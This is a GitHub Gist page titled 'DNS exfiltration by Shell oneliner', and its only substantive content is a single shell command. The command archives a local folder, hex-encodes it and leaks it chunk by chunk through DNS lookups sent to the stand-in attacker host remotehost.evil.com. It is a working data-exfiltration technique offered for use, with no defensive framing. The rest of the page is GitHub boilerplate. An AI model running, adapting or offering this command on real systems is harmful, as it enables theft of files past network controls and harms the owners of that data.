Created
December 4, 2013 23:04
-
-
Save trolldbois/7797236 to your computer and use it in GitHub Desktop.
DNS exfiltration by Shell oneliner
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#from http://scilspace.com/content/data-exfiltration-over-dns | |
(tar zcf - localfolder | xxd -p -c 16 | while read line; do host $line.domain.com remotehost.evil.com; done) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment